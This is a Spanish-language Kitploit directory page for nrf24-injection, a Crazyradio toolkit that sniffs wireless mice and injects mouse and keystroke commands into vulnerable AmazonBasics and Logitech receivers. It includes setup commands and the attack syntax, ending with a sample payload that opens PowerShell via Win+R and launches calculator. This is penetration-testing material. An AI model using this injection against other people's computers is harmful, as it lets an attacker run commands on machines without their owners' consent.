Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
nrf24-injection — Un conjunto de herramientas para rastrear dispositivos y lanzar ataques con Crazyradio | Kitploit
Herramientas/GitHubGitHub/xswxm/nrf24-injection
ExplotaciónSeguridad InalámbricaHacking de HardwarePruebas de Penetración
GitHubxswxm/nrf24-injection

nrf24-injection

Un conjunto de herramientas para rastrear dispositivos y lanzar ataques con Crazyradio

Ver Repositorio
181hace 8 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

Un conjunto de herramientas para esnifar dispositivos y lanzar ataques con Crazyradio. Basado en la investigación de BastilleResearch.

Configuración

Instalar módulos adicionales

root@kitploit:~
sudo apt-get install sdcc binutils python python-pip
sudo pip install -U pip
sudo pip install -U -I pyusb
sudo pip install -U platformio

Dispositivos Compatibles

DispositivoSniffAtaqueDetalles
AmazonBasicsSí(no responde)SíControl de ratón e Inyección HID
Logitech MiceSíSíControl de ratón

Cómo Usar

root@kitploit:~
# Run directly
sudo python app.py
# For Crazyradio PA users
sudo python app.py -l
# Check for help documents
sudo python app.py -h

Cómo Usar Ataques

root@kitploit:~
# Please check attacking rules in 'devices/*.py' for details
# Further infomation will added to here once I have time
# Attacking thread sleeps for 100 milliseconds
<SLP(100)>
# Move mouse by 100*100 only
<MOV(100,100)>
# Press Left button only (Mouse)
<MOV(L)>
# Move mouse by 100*100 and press Left, Right and Middle buttons
<MOV(100,100,LMR)>
# Release the buttons for mice, you can send another MOV command without any buttons
<MOV(0,0)>
<MOV()>
# Send keystrokes to release all keys
<RLS>
# Send 'Windows + r' key combination
<WIN+r>
# Send 'Ctrl + Alt + Delete' key combination
<CTRL+ALT+DEL>
# For Windows computers, the following commmand will open the Powershell and then open the Caculator
<RLS><WIN+r><RLS><SLP(500)><RLS>powershell<ENTER><RLS><SLP(500)><RLS>calc<ENTER><RLS>

Licencia

GPL

Descargar herramienta